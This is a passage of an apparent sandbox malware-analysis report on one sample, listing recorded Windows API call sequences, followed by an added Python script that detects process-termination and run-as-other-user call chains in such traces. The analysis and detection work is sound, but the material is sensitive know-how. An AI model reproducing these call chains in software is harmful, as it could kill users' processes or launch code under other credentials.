                        • EndPaint.USER32(?,?,?,?,?), ref: 00999321
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009D71EA
                          • Part of subcall function 00999339: BeginPath.GDI32(00000000), ref: 00999357
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                        • String ID:
                        • API String ID: 3050599898-0
                        • Opcode ID: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
                        • Instruction ID: d9b6006f3f77405cd083eef74be73082a216968b91dee4b9826c029ee2931d13
                        • Opcode Fuzzy Hash: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
                        • Instruction Fuzzy Hash: 0241B070148300EFDB21DFA8CC85FBA7BA8FB46321F04462DF965872A1D7319846DB61
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 009F080C
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009F0847
                        • EnterCriticalSection.KERNEL32(?), ref: 009F0863
                        • LeaveCriticalSection.KERNEL32(?), ref: 009F08DC
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009F08F3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 009F0921
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                        • String ID:
                        • API String ID: 3368777196-0
                        • Opcode ID: 49872d0d11098e731574ec312aa617e9117e9b7da855c6e68305d316ed1a8ce6
                        • Instruction ID: 91bd66663744f41efdf8114728468a3260a4edf7e685d669e51da044c1f709de
                        • Opcode Fuzzy Hash: 49872d0d11098e731574ec312aa617e9117e9b7da855c6e68305d316ed1a8ce6
                        • Instruction Fuzzy Hash: 9B417E75900209EBDF14EF94DC85AAAB778FF84310F1480A5ED04DA297D731DE65DBA0
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009DF3AB,00000000,?,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 00A1824C
                        • EnableWindow.USER32(00000000,00000000), ref: 00A18272
                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A182D1
                        • ShowWindow.USER32(00000000,00000004), ref: 00A182E5
                        • EnableWindow.USER32(00000000,00000001), ref: 00A1830B
                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A1832F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
                        • Instruction ID: d3d0fc99407b814db5f520a4259970dca515a52db2f61ee2454d100b8ceee6a6
                        • Opcode Fuzzy Hash: ea339cb9d5eba2b5ff12668dd538dae7694a4cac9b36a17fac6075cccecc8d6b
                        • Instruction Fuzzy Hash: A041E474601640EFDB22CF54D899BE47BE1FB0A715F1841A8F5684F2B2CB79AC82CB40
                        APIs
                        • IsWindowVisible.USER32(?), ref: 009E4C95
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009E4CB2
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009E4CEA
                        • _wcslen.LIBCMT ref: 009E4D08
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009E4D10
                        • _wcsstr.LIBVCRUNTIME ref: 009E4D1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                        • String ID:
                        • API String ID: 72514467-0
                        • Opcode ID: 513784e8fc8f22fc12fea4e8fcac6a5746257a4e99493e4b10807c894006e114
                        • Instruction ID: 8bddacc791c9fc6602e0e2155d973fd820728c588c14281c5f787621052be760
                        • Opcode Fuzzy Hash: 513784e8fc8f22fc12fea4e8fcac6a5746257a4e99493e4b10807c894006e114
                        • Instruction Fuzzy Hash: A7210B32204240BBEB169B7ADC49F7B7B9DDF85760F108039F805CB192DA65DC41D6A0
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                        • _wcslen.LIBCMT ref: 009F587B
                        • CoInitialize.OLE32(00000000), ref: 009F5995
                        • CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F59AE
                        • CoUninitialize.OLE32 ref: 009F59CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 3172280962-24824748
                        • Opcode ID: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
                        • Instruction ID: 315d41df2f9925f73e7793fba7b7149b9ebda278855efdabc61f8b8aca2f8672
                        • Opcode Fuzzy Hash: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
                        • Instruction Fuzzy Hash: 07D173746087059FC714EF24C480A2ABBE5FF89724F15885DFA8A9B361DB31EC45CB92
                        APIs
                          • Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
                          • Part of subcall function 009E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
                          • Part of subcall function 009E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
                          • Part of subcall function 009E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
                          • Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002
                        • GetLengthSid.ADVAPI32(?,00000000,009E1335), ref: 009E17AE
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009E17BA
                        • HeapAlloc.KERNEL32(00000000), ref: 009E17C1
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 009E17DA
                        • GetProcessHeap.KERNEL32(00000000,00000000,009E1335), ref: 009E17EE
                        • HeapFree.KERNEL32(00000000), ref: 009E17F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
                        • Instruction ID: 80d82af0dcaaadfce70bf18b9c1b5fae51903ff6a236d2d0fe2632689ae44bda
                        • Opcode Fuzzy Hash: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
                        • Instruction Fuzzy Hash: E811A932680205FFDB11DFA5CC49BAE7BB9EB45765F108518F881A7210C736AD41CB60
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009E14FF
                        • OpenProcessToken.ADVAPI32(00000000), ref: 009E1506
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009E1515
                        • CloseHandle.KERNEL32(00000004), ref: 009E1520
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E154F
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 009E1563
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
                        • Instruction ID: eb0869a5abb2df8e6db171849d2700f9edf70d7590963d7fd2baaea6826015d8
                        • Opcode Fuzzy Hash: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
                        • Instruction Fuzzy Hash: 20115672600249ABDF12CFE8DD49BDE7BADEF48714F048024FA05A61A0D375CE61DB60
                        APIs
                        • GetLastError.KERNEL32(?,?,009A3379,009A2FE5), ref: 009A3390
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009A339E
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009A33B7
                        • SetLastError.KERNEL32(00000000,?,009A3379,009A2FE5), ref: 009A3409
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
                        • Instruction ID: 7b2da55b6b931b0eb283013fee50de442cb0a4d9b20026373c8e38ecaee1211b
                        • Opcode Fuzzy Hash: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
                        • Instruction Fuzzy Hash: 7801473B60E711BEEA6427F47C866672A98EBC7379320C229F424841F0FF124D0251C4
                        APIs
                        • GetLastError.KERNEL32(?,?,009B5686,009C3CD6,?,00000000,?,009B5B6A,?,?,?,?,?,009AE6D1,?,00A48A48), ref: 009B2D78
                        • _free.LIBCMT ref: 009B2DAB
                        • _free.LIBCMT ref: 009B2DD3
                        • SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DE0
                        • SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DEC
                        • _abort.LIBCMT ref: 009B2DF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 5bf8c82b4063843cf2084ec2a5944083f3209c28d30ea6f554671c51cde8121e
                        • Instruction ID: 09a4c3b3ac414140596bae410b8dea89ffea559cb35377e5ef90ae152a5d5425
                        • Opcode Fuzzy Hash: 5bf8c82b4063843cf2084ec2a5944083f3209c28d30ea6f554671c51cde8121e
                        • Instruction Fuzzy Hash: 48F0C83654561037C612B778BF0AFDA265DFFC67B1F258918F838961D6EE2488025160
                        APIs
                          • Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
                          • Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2
                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A18A4E
                        • LineTo.GDI32(?,00000003,00000000), ref: 00A18A62
                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A18A70
                        • LineTo.GDI32(?,00000000,00000003), ref: 00A18A80
                        • EndPath.GDI32(?), ref: 00A18A90
                        • StrokePath.GDI32(?), ref: 00A18AA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
                        • Instruction ID: d8bc53f8bf733eb55d79d58527e808d3ad25b64b97dbde0fa7c1f9f85dac8baa
                        • Opcode Fuzzy Hash: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
                        • Instruction Fuzzy Hash: 5D11B776040109FFDB129F94EC88EEA7F6DEB083A4F04C052FA199A1A1C7719D56DBA0
                        APIs
                        • GetDC.USER32(00000000), ref: 009E5218
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 009E5229
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E5230
                        • ReleaseDC.USER32(00000000,00000000), ref: 009E5238
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009E524F
                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 009E5261
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
                        • Instruction ID: 21924f67b244b368b090e3d01486e4a279adc0a6f300794d23a5a90d0db233a9
                        • Opcode Fuzzy Hash: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
                        • Instruction Fuzzy Hash: F2014475A40754BBEB109BE69C49B9EBF78EB48761F048065FA05A7381D6709D01CB60
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
                        • Instruction ID: 23cc2df4ebed77ac28f1ed4a923a76d006a807a9f7d32275869e0fefc23000d1
                        • Opcode Fuzzy Hash: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
                        • Instruction Fuzzy Hash: F60167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009EEB30
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009EEB46
                        • GetWindowThreadProcessId.USER32(?,?), ref: 009EEB55
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB64
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB6E
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
                        • Instruction ID: 6640f220f57d0be27e8f568e91236d92b5297deeb0cef6694a1c82884508e171
                        • Opcode Fuzzy Hash: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
                        • Instruction Fuzzy Hash: 6AF03072580168BBE72197929C0DEEF7A7CEFCAB21F008158F611D1091D7A45A02C6B5
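The two "APIs" records above for the call sites 009E14FF-009E1563 (OpenProcessToken, CreateEnvironmentBlock, CreateProcessWithLogonW, DestroyEnvironmentBlock) and 009EEB30-009EEB75 (WM_CLOSE via PostMessageW and SendMessageTimeoutW with SMTO_ABORTIFHUNG and a 0x1F4 = 500 ms timeout, then GetWindowThreadProcessId, OpenProcess with 0x1F0FFF, TerminateProcess) are ordered lists of call sites with the arguments recorded on the stack. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses lines in exactly this format (Api.MODULE(args), ref: address, with the optional "Part of subcall function" prefix) and matches the two chains as ordered subsequences. The chain names, the constant name PROCESS_ALL_ACCESS_LEGACY (0x1F0FFF is PROCESS_ALL_ACCESS as defined for pre-Vista SDK targets) and the helper names are mine; the trace lines embedded in the block are copied from the two records above.

```python
"""Added example: parse Joe Sandbox 'APIs' trace lines and flag two call chains."""
import re
from dataclasses import dataclass
from typing import Optional
# "• Api.MODULE(args), ref: ADDR", optional "Part of subcall function X:" prefix, args and ref optional.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
WM_CLOSE = 0x10
PROCESS_ALL_ACCESS_LEGACY = 0x1F0FFF  # PROCESS_ALL_ACCESS for pre-Vista SDK targets

@dataclass
class ApiCall:
    api: str
    module: str
    args: list             # int for hex tokens, None for '?', str for literals
    ref: Optional[int]     # call-site address in the dump
    parent: Optional[int]  # set for 'Part of subcall function X' lines

def parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    sign = -1 if tok.startswith("-") else 1
    try:
        return sign * int(tok.lstrip("-"), 16)
    except ValueError:
        return tok  # string literal such as DllGetClassObject

def parse_trace(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # 'APIs', 'Memory Dump Source' and other header lines are skipped
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        ref = int(m["ref"], 16) if m["ref"] else None
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], args, ref, parent))
    return calls

def arg_is(index: int, value: int):
    # Recorded argument lists are stack snapshots that run past the real parameter count
    # (OpenProcess shows 16 values above), so only leading positions are meaningful.
    return lambda c: len(c.args) > index and c.args[index] == value

def matches_chain(calls: list, chain: list) -> bool:
    """True if every (api, predicate) pair occurs in order, not necessarily adjacently."""
    pos = 0
    for api, pred in chain:
        while pos < len(calls) and not (calls[pos].api == api and (pred is None or pred(calls[pos]))):
            pos += 1
        if pos == len(calls):
            return False
        pos += 1
    return True

CHAINS = {
    # Ask the window to close, then open its owner with full access and kill it.
    "kill-window-owner": [
        ("SendMessageTimeoutW", arg_is(1, WM_CLOSE)),
        ("GetWindowThreadProcessId", None),
        ("OpenProcess", arg_is(0, PROCESS_ALL_ACCESS_LEGACY)),
        ("TerminateProcess", None),
    ],
    # Build an environment block and launch a process under other credentials.
    "run-as-other-user": [
        ("OpenProcessToken", None),
        ("CreateEnvironmentBlock", None),
        ("CreateProcessWithLogonW", None),
        ("DestroyEnvironmentBlock", None),
    ],
}

def classify(text: str) -> list[str]:
    """Names of the known chains present in one function's 'APIs' block."""
    calls = parse_trace(text)
    return [name for name, chain in CHAINS.items() if matches_chain(calls, chain)]

# Trace lines copied verbatim from two function records on this page.
KILL_TRACE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009EEB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009EEB46
• GetWindowThreadProcessId.USER32(?,?), ref: 009EEB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB75
"""
RUNAS_TRACE = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009E14FF
• OpenProcessToken.ADVAPI32(00000000), ref: 009E1506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009E1515
• CloseHandle.KERNEL32(00000004), ref: 009E1520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 009E1563
"""
```

classify(KILL_TRACE) returns ["kill-window-owner"] and classify(RUNAS_TRACE) returns ["run-as-other-user"]; any other "APIs" block from this report can be passed to classify as-is, header lines included. Matching on argument values is deliberately limited to leading positions: the recorded lists are stack snapshots and frequently show more values than the API takes, so a predicate on a trailing index would be testing unrelated stack slots.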
                        APIs
                        • GetClientRect.USER32(?), ref: 009D7452
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 009D7469
                        • GetWindowDC.USER32(?), ref: 009D7475
